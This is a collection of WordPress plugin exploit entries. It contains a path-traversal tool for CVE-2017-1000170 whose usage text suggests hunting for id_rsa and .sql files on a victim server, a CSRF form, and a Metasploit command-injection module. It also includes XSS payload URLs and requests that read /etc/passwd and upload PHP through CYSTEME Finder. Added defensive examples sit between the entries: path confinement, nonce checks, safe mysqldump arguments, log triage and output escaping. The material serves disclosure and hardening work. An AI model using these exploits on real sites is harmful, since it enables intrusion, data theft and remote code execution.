		echo cyan("\n\n  Ok, don't say I didn't warn you...\n");
	}
	list_files($target,$path, $recursive, $filter);
}


############################################################

function green($str){
    return "\e[92m".$str."\e[0m";
}
function red($str){
    return "\e[91m".$str."\e[0m";
}
function yellow($str){
    return "\e[93m".$str."\e[0m";
}
function cyan($str){
    return "\e[96m".$str."\e[0m";
}

function banner(){
	echo "
  _____       _ _       _     _    __       _ _______
 |  __ \     | (_)     | |   | |  / _|     | |__   __|
 | |  | | ___| |_  __ _| |__ | |_| |_ _   _| |  | |_ __ ___  ___
 | |  | |/ _ \ | |/ _` |  _ \| __|  _| | | | |  | | ´__/ _ \/ _ \
 | |__| |  __/ | | (_| | | | | |_| | | |_| | |  | | | |  __/  __/
 |_____/ \___|_|_|\__, |_| |_|\__|_|  \__,_|_|  |_|_|  \___|\___|
   		   __/ |                ".green("Coder:  ").yellow("Nicholas Ferreira")."
 		  |___/				     0x7359

  ".cyan("Delightful Downloads - Jquery File Tree")."
  Unauthenticated Path Traversal exploit ".
red("\n  (CVE-2017-1000170)")."

";
}



// ======================= CHECKING =======================



$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);

if($argc == 1){
	die(banner()."  Usage: php xpl_jqueryFileTree.php -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]\n\n  Help: -h or --help\n\n");
}

if(isset($options['h']) || isset($options['help'])){
banner();
die( "  Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]

  -h, --help: Show this message
  -u, --url: URL of target
  -a, --random-agent: Use random user agents
  -f, --filter: Name of files or extensions to search for (separated by comma)
  -p, --path: The full path from which the filenames will be read (default: /)
  -r, --recursive: Generates the tree recursively (be careful)

  e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
        |
         \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
             (You must provide the dot to indicate it's an extension)

        ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
        |
         \-> This will search for all files named \"id_rsa\" or having the extension
             \".log\" within all folders of the server, with random user-agents

        ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."


");

}

$random_agent = 0;
if(isset($options['a'])){
	$random_agent = 1;
}elseif(isset($options['random-agent'])){
	$random_agent = 1;
}

$target = "";
if(isset($options['u'])){
	$target = $options['u'];
}elseif(isset($options['url'])){
	$target = $options['url'];
}

$recursive = 0;
if(isset($options['r'])){
	$recursive = 1;
}elseif(isset($options['recursive'])){
	$recursive = 1;
}

$path = "/";
if(isset($options['p'])){
	$path = $options['p'];
}elseif(isset($options['path'])){
	$path = $options['path'];
}


if($path !== "/"){
	if(!preg_match("#^\/.*\/$#", $path)){
		$path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it
	}
}


$extensions = "";
if(isset($options['f'])){
	$extensions = $options['f'];			//strings
}elseif(isset($options['filter'])){
	$extensions = $options['filter'];	//string
}

$filter = array();

if($extensions !== ""){
	$filter = explode(",", $extensions);
}


// ========================= END CHECKING ==========================

function is_vulnerable($url){
	global $vuln_file;
	global $random_agent;
	global $filter;

	echo "  [*] Target: ".$url."\n";
	if(count($filter) > 0){
		echo "  [*] Filter: ".implode(", ", $filter)."\n\n";
	}
	echo cyan("  [i] Checking if the target is vulnerable...\n");
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
    curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
	curl_exec($ch);
 	$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

	if(substr($code,0,1) == 2){ // 2xx
		echo yellow("  [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
		$post = post_request($url.$vuln_file, "/", $random_agent);
		if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
			echo green("  [+] Target is vulnerable! Getting file list...\n\n");
			return true;
		}
		echo red("  [-] Target is not vulnerable... =(\n\n");
	}else{
		echo red("  [-] Could not find a valid vulnerable file. Maybe it doesn't exist, 
  you don't have permission to read it or it is in another directory.\n");
	}
	return false;
}
banner();

if(is_vulnerable($target)){
	global $filter;
	alert_user($target,$path, $recursive, $filter);
	echo green("\n  [+] Done!\n\n");
}

?>
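
The canonicalisation check the jqueryFileTree connector above lacks: its "dir" POST value is used as a filesystem path as received, so dir=/etc/ lists /etc. This is an added example, not the plugin's own code. It runs stand-alone from the CLI on Linux (it creates a symlink); the base directory and its contents are constructed in the system temp directory.

```php
<?php
// Added example: confine a requested directory to a base directory using
// realpath() and a prefix check. Demo tree is constructed in the temp dir.

/**
 * Return the canonical path for $requested if it resolves inside $base,
 * otherwise null. A listing routine should only ever list what this returns.
 */
function safe_listing_path(string $base, string $requested): ?string
{
    $base_real = realpath($base);
    if ($base_real === false) {
        return null;
    }
    // NUL bytes: PHP 8 filesystem functions throw on them, PHP 7 returns
    // false with a warning. Reject explicitly so both versions behave alike.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Interpret the request relative to the base (an absolute /etc/ becomes
    // <base>/etc/) and canonicalise it, which resolves ../ and symlinks.
    $candidate = realpath($base_real . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($candidate === false) {
        return null;   // target does not exist
    }
    $prefix = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base_real && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;   // resolved outside the base via ../ or a symlink
    }
    return $candidate;
}

// --- demonstration on a constructed directory tree ---
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ddl_demo_' . getmypid();
mkdir($base . '/downloads', 0700, true);
file_put_contents($base . '/downloads/report.pdf', 'sample');
symlink('/etc', $base . '/downloads/link');   // a link pointing out of the tree

$samples = [
    'downloads/',            // allowed
    'downloads/report.pdf',  // allowed
    '/etc/',                 // rejected: <base>/etc does not exist
    '../../../etc/',         // rejected: resolves to /etc, outside the base
    'downloads/link/',       // rejected: symlink resolves to /etc
    "downloads/\0",          // rejected: NUL byte
];
foreach ($samples as $s) {
    $r = safe_listing_path($base, $s);
    printf("%-22s => %s\n", addcslashes($s, "\0"),
        $r === null ? 'rejected' : str_replace($base, '<base>', $r));
}

// cleanup
unlink($base . '/downloads/link');
unlink($base . '/downloads/report.pdf');
rmdir($base . '/downloads');
rmdir($base);
```

The prefix comparison runs on the output of realpath(), not on the request string, which is what makes the symlink case safe: a pattern filter on "../" would have let downloads/link/ through.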
            
# Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
# Date: 2/10/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/database-backups/
# Version: 1.2.2.6
# Tested on: Windows 10
# CVE: CVE-2021-24174

1. Description:
This plugin allows admins to create and download database backups. A CSRF attack can create DB backups that are stored publicly in the uploads directory.

2. Proof of Concept:

<form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post">
    <input type="hidden" name="do_backup_manually" value="1">
    <input type="submit" class="button button-primary" value="Do backup" autocomplete="off">
</form>

Backups can be accessed by the following URL.
http://localhost/wp-content/uploads/database-backups/
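
A hardened replacement for the basic_settings() handler quoted in the Download Manager 2.7.2 entry, applying the checks that the CSRF entries (Download Manager 2.5 email settings and templates, and the Database Backups "Do backup" form above) also lack: a capability check, a nonce check, and an allowlist of option names instead of a loop over $_POST. This is an added example, not any plugin's own code. It assumes it runs inside WordPress (current_user_can, check_ajax_referer, update_option, delete_option, wp_unslash, absint, sanitize_text_field and wp_send_json_* are core functions); the option names other than __wpdm_login_form and the nonce action 'wdm_save_settings' are hypothetical.

```php
<?php
// Added example: settings handler with authorisation, CSRF protection and an
// option allowlist. Assumes WordPress is loaded. Option names other than
// __wpdm_login_form and the nonce action are hypothetical.

function wdm_basic_settings_hardened()
{
    // 1. Authorisation. The original accepted any logged-in user; only users
    //    who may manage options should be able to write options.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    // 2. CSRF. The request must carry a nonce bound to this action and user;
    //    the settings form emits it with wp_nonce_field('wdm_save_settings').
    //    This call terminates the request with 403 if the nonce is bad.
    check_ajax_referer('wdm_save_settings', '_wpnonce');

    if (!isset($_POST['task']) || $_POST['task'] !== 'wdm_save_settings') {
        wp_send_json_error('unknown task', 400);
    }

    // 3. Allowlist. Iterate over the plugin's own options, never over $_POST:
    //    the original loop is what let default_role=administrator be written.
    $allowed = [
        '__wpdm_login_form'  => 'checkbox',   // from the original handler
        'wdm_items_per_page' => 'int',        // hypothetical
        'wdm_page_title'     => 'text',       // hypothetical
    ];

    foreach ($allowed as $name => $type) {
        $raw = isset($_POST[$name]) ? wp_unslash($_POST[$name]) : null;
        switch ($type) {
            case 'checkbox':
                // Unchecked boxes are absent from the body; keep the original
                // delete_option() behaviour for that case.
                if ($raw === null) {
                    delete_option($name);
                } else {
                    update_option($name, 1);
                }
                break;
            case 'int':
                if ($raw !== null) {
                    update_option($name, absint($raw));
                }
                break;
            case 'text':
                if (is_string($raw)) {
                    update_option($name, sanitize_text_field($raw));
                }
                break;
        }
    }
    wp_send_json_success('Settings Saved Successfully');
}

// Same admin-ajax action the PoC posts to; no wp_ajax_nopriv_ counterpart.
add_action('wp_ajax_wdm_settings', 'wdm_basic_settings_hardened');
```

For forms that post to an admin page rather than admin-ajax.php (tools.php?page=database-backups, the edit.php template editor), the equivalent pair is wp_nonce_field() in the form and check_admin_referer() in the handler; the capability check and the allowlist stay the same.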
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WP Database Backup RCE',
      'Description'    => %q(
        There exists a command injection vulnerability in the Wordpress plugin
        `wp-database-backup` for versions < 5.2.

        For the backup functionality, the plugin generates a `mysqldump` command
        to execute. The user can choose specific tables to exclude from the backup
        by setting the `wp_db_exclude_table` parameter in a POST request to the
        `wp-database-backup` page. The names of the excluded tables are included in
        the `mysqldump` command unsanitized. Arbitrary commands injected through the
        `wp_db_exclude_table` parameter are executed each time the functionality
        for creating a new database backup is run.

        Authentication is required to successfully exploit this vulnerability.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
        'Shelby Pace'                  # Metasploit module
      ],
      'References'     =>
        [
          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
            'Windows',
            {
              'Platform'        => 'win',
              'Arch'            => [ ARCH_X86, ARCH_X64 ]
            }
          ],
          [
            'Linux',
            {
              'Platform'        =>  'linux',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' =>  'printf'
            }
          ]
        ],
      'DisclosureDate' => '2019-04-24',
      'DefaultTarget'  => 0
    ))

    register_options(
    [
      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
    ])
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  changelog_uri
    )

    if res && res.code == 200
      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
      return CheckCode::Detected unless version && version.length > 1

      vprint_status("Version of wp-database-backup detected: #{version[1]}")
      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
    end
    CheckCode::Safe
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie

    res = create_exclude_table(cookie)
    nonce = get_nonce(res)
    create_backup(cookie, nonce)

    clear_exclude_table(cookie)
  end

  def create_exclude_table(cookie)
    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
    res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
    )

    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
    print_good('Reached the wp-database-backup settings page')
    if datastore['TARGET'] == 1
      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
      comm_payload = comm_payload.join('&&')
      comm_payload = comm_payload.gsub('\'', '')
      comm_payload = "; #{comm_payload} ;"
    else
      comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
    end

    table_res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_post' =>
      {
        'wpsetting'                       =>  'Save',
        'wp_db_exclude_table[wp_comment]' =>  comm_payload
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
    print_good('Successfully added payload as an excluded table')

    res.get_html_document
  end

  def get_nonce(response)
    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response

    div_res = response.at('p[@class="submit"]')
    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res

    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1

    wpnonce[1]
  end

  def create_backup(cookie, nonce)
    first_res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>
      {
        'page'      =>  'wp-database-backup',
        '_wpnonce'  =>  nonce,
        'action'    =>  'createdbbackup'
      }
    )

    res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>
      {
        'page'          =>  'wp-database-backup',
        'notification'  =>  'create'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
    print_good('Successfully created a backup of the database')
  end

  def clear_exclude_table(cookie)
    res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_post' =>
      {
        'wpsetting'                       =>  'Save',
        'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to remove the payload from the excluded tables') unless res && res.code == 200
    print_good('Successfully deleted the payload from the excluded tables list')
  end
end
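
Safe construction of the mysqldump command line that, per the module description above, wp-database-backup built from unsanitised wp_db_exclude_table values. This is an added example, not the plugin's own code. It runs stand-alone: the table list is constructed instead of coming from $wpdb->get_col('SHOW TABLES'), the credentials file path is a placeholder, and the command is returned rather than executed.

```php
<?php
// Added example: allowlist excluded table names against the real table list,
// then quote every argument. Table list and credentials path are constructed.

/**
 * Build the argument vector for mysqldump.
 *
 * $known_tables is the set of tables that actually exist in the database; any
 * requested exclusion that is not one of them is dropped and reported in
 * $rejected. Credentials are deliberately not on the command line: they are
 * read from a --defaults-extra-file (placeholder path here).
 */
function build_mysqldump_argv(string $db, array $known_tables, array $requested_excludes, array &$rejected = []): array
{
    $known = array_flip($known_tables);
    $argv = ['mysqldump', '--defaults-extra-file=/path/to/backup.cnf', '--single-transaction', $db];
    $rejected = [];
    foreach ($requested_excludes as $t) {
        // Allowlist: an exclusion is valid only if it names an existing table.
        // "; id ;" or "wp_users & whoami & ::" never match a real table name.
        if (!is_string($t) || !isset($known[$t])) {
            $rejected[] = $t;
            continue;
        }
        $argv[] = '--ignore-table=' . $db . '.' . $t;
    }
    return $argv;
}

/**
 * Render argv as a shell command with every element quoted. Defence in depth:
 * MySQL allows backtick-quoted identifiers with shell metacharacters, so even
 * a real table name could not terminate the command.
 */
function shell_command(array $argv): string
{
    return implode(' ', array_map('escapeshellarg', $argv));
}

// Constructed inputs: the real tables and a mixed exclusion request.
$db        = 'wordpress';
$tables    = ['wp_posts', 'wp_comments', 'wp_users', 'wp_options'];
$requested = ['wp_comments', '; id ;', 'wp_users & whoami & ::', 'wp_options'];

$argv = build_mysqldump_argv($db, $tables, $requested, $rejected);
echo shell_command($argv), "\n";
echo 'rejected: ', json_encode($rejected), "\n";
```

On PHP 7.4 and later the argv array can be handed directly to proc_open(), which starts the process without a shell at all; the allowlist still matters there, because an unknown name would otherwise surface as a mysqldump error at backup time rather than as a rejected input.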
            
source: https://www.securityfocus.com/bid/47620/info

The Daily Maui Photo Widget plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Daily Maui Photo Widget plugin 0.2 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/daily-maui-photo-widget/wp-dailymaui-widget-control.php?title=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
            
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com

### SUMMARY

CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request 
to http://server/wp-content/plugins/cysteme-finder/php/connector.php 

This allows attackers to upload, download, and browse the remote file system. 

### LFI

- Retrieve all data in the root wordpress directory. This will return JSON. 
Exploit: 
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1

Reply:
{
  "cwd": {
    "mime": "directory",
    "ts": 1471999484,
    "read": 1,
    "write": 1,
    "size": 0,
    "hash": "l1_Lw",
    "volumeid": "l1_",
    "name": "Fichiers du site",
    "date": "Today 20:44",
    "locked": 1,
    "dirs": 1
  },
  "options": {
    "path": "Fichiers du site",
    "url": null,
    "tmbUrl": "",
    "disabled": [
      
    ],
    "separator": "\/",
    "copyOverwrite": 1,
    "archivers": {
      "create": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2"
      ],
      "extract": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2",
        "application\/zip"
      ]
    }
  },
  "files": [
    {
      "mime": "directory",
      "ts": 1471999484,
      "read": 1,
      "write": 1,
      "size": 0,
      "hash": "l1_Lw",
      "volumeid": "l1_",
      "name": "Fichiers du site",
      "date": "Today 20:44",
      "locked": 1,
      "dirs": 1
    },
    {
      "mime": "text\/plain",
      "ts": 1471714510,
      "read": 1,
      "write": 1,
      "size": 813,
      "hash": "l1_Lmh0YWNjZXNz",
      "name": ".htaccess",
      "phash": "l1_Lw",
      "date": "20 Aug 2016 13:35"
    },

Replacing wphome with any other directory path returns the file information for that directory. 
To download a file, take its hash value from the listing and use it as the target in the following request:
 
This will download /etc/passwd:
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1

### File Upload

As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following. 

POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

----------723608748
Content-Disposition: form-data; name="cmd"

upload
----------723608748
Content-Disposition: form-data; name="target"

l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html

<?php phpinfo(); ?>
----------723608748--
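The connector endpoint described above accepts its commands without an authenticated session, so the place a defender can still see the abuse is the web-server access log. The following is an added example, not code from the advisory or from the plugin: it scans constructed Apache "combined" log lines for requests to connector.php whose `wphome` points outside the site root, that download a file by hash, or that POST to the connector (where upload commands travel in the body the log does not record). The hash decoder is inferred from the hashes shown in the advisory (`l1_Lw` for `/`, `l1_Lmh0YWNjZXNz` for `.htaccess`, `l1_cGFzc3dk` for `passwd`); the log lines and the `/var/www/wordpress` root are assumptions.

```python
"""Access-log triage for the CYSTEME Finder connector.php endpoint.
Added example for this page; not part of the advisory or the plugin.
Assumes Apache/nginx "combined" log format and a site root of
/var/www/wordpress (both constructed assumptions)."""
import base64
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

WP_ROOT = "/var/www/wordpress"   # assumed document root of the WordPress install
CONNECTOR = "/cysteme-finder/php/connector.php"

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2016:20:44:01 +0000] "GET /wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Aug/2016:20:44:09 +0000] "GET /wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1 HTTP/1.1" 200 2103 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Aug/2016:20:45:12 +0000] "POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.168.1.20 - - [23/Aug/2016:21:02:33 +0000] "GET /wp-admin/admin.php?page=cysteme-finder HTTP/1.1" 200 6540 "-" "Mozilla/5.0"
"""

# "combined" format: client ident user [time] "METHOD url HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_hash(h):
    """Recover the path inside an elFinder-style hash such as l1_cGFzc3dk.
    Scheme inferred from the advisory's hashes: drop the volume id, undo the
    '+/=' -> '-_.' substitution, re-add base64 padding, base64-decode."""
    body = h.split("_", 1)[1] if "_" in h else h
    body = body.translate(str.maketrans("-_.", "+/="))
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body).decode("utf-8", "replace")


def inspect_request(method, url):
    """Return the reasons this request looks like connector abuse ([] if none)."""
    parts = urlsplit(url)
    if not parts.path.endswith(CONNECTOR):
        return []
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    reasons = []
    wphome = q.get("wphome")
    if wphome is not None:
        root = posixpath.normpath(WP_ROOT)
        home = posixpath.normpath(wphome)
        if home != root and not home.startswith(root + "/"):
            reasons.append("wphome outside WordPress root: %s" % home)
    if q.get("cmd") == "file" and q.get("download") == "1":
        target = q.get("target", "")
        reasons.append("file download of %s" % (decode_hash(target) if target else "?"))
    if method == "POST":
        # upload/mkdir/rm commands are sent in the POST body, which the access
        # log does not record, so every POST to the connector deserves a look
        reasons.append("POST to connector (possible upload)")
    return reasons


def scan_log(text):
    """Return (ip, timestamp, reasons) for every suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["method"], m["url"])
        if reasons:
            hits.append((m["ip"], m["ts"], reasons))
    return hits


if __name__ == "__main__":
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(ip, ts, "; ".join(reasons))
```

The first sample line (a listing of the site root) is deliberately not flagged: by URL alone it is indistinguishable from an administrator's own use of the file manager, which is why log triage complements, but does not replace, an authentication check in front of the connector.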
            
source: https://www.securityfocus.com/bid/54326/info

The WordPress Custom Tables plugin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Custom Tables 3.4.4 is vulnerable; prior versions may also be affected. 


http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E 
            
# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 5.6
2. Install and activate the Custom Global Variables plugin.
3. Navigate to Settings >> Custom Global Variables and enter data into the user input field.
4. Capture the request in Burp Suite and append the JavaScript payload mentioned below:
"><script>(1)</script><"
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
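Both of the XSS entries above share one root cause: a user-controlled value (the reflected `key` query parameter of Custom Tables, or the stored `name` setting of Custom Global Variables read back from the database) is written into an HTML attribute without escaping for that context, so a value beginning with `">` closes the attribute and the tag and starts a new `<script>` element. The following is an added example, not code from either plugin: it renders the advisories' payload shapes into a constructed attribute template the vulnerable way and the escaped way, counts the tags a parser finds in each, and shows for the stored case that sanitizing on save does not remove the need to escape on output. `html.escape(quote=True)` stands in for WordPress's `esc_attr()`; the template, the in-memory settings store and the simplified tag-stripping step are assumptions.

```python
"""Attribute-context escaping for the two XSS entries above.
Added example; not code from the Custom Tables or Custom Global Variables plugins.
The template, settings store and sample values are constructed."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample inputs mirroring the payload shapes in the advisories
REFLECTED_URL = ("/wordpress/wp-content/plugins/custom-tables/iframe.php"
                 "?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E")
STORED_NAME = '"><script>(1)</script><"'

# Assumed output template: the value lands inside a double-quoted attribute
TEMPLATE = '<input type="text" name="key" value="%s">'


def key_from_url(url):
    """Extract the 'key' query parameter as the server would see it."""
    return parse_qs(urlsplit(url).query).get("key", [""])[0]


def render_unsafe(value):
    """Vulnerable pattern: raw interpolation into the attribute."""
    return TEMPLATE % value


def render_escaped(value):
    """Hardened pattern: escape for the attribute context at output time
    (the Python analogue of WordPress's esc_attr())."""
    return TEMPLATE % html.escape(value, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup):
    """The template contains exactly one tag, so anything beyond ['input']
    was contributed by the injected value."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


# Stored case: a minimal settings store that sanitizes on save. The regex is a
# simplified tag-stripping step, not WordPress's sanitize_text_field().
_SETTINGS = {}


def save_setting(key, value):
    _SETTINGS[key] = re.sub(r"<[^>]*>", "", value).strip()
    return _SETTINGS[key]


def render_setting(key):
    # Sanitizing on input is defense in depth, not a substitute for escaping:
    # the stored value still carries quotes and angle brackets that must be
    # encoded for the attribute context when it is rendered back.
    return render_escaped(_SETTINGS.get(key, ""))


if __name__ == "__main__":
    key = key_from_url(REFLECTED_URL)
    print("reflected, unsafe :", start_tags(render_unsafe(key)))
    print("reflected, escaped:", start_tags(render_escaped(key)))
    save_setting("name", STORED_NAME)
    print("stored, unsafe    :", start_tags(render_unsafe(STORED_NAME)))
    print("stored, escaped   :", start_tags(render_setting("name")))
```

The tag count is the check a reviewer can apply to any template: if rendering a value changes the number of start tags the parser sees, the value was not escaped for the context it was placed in.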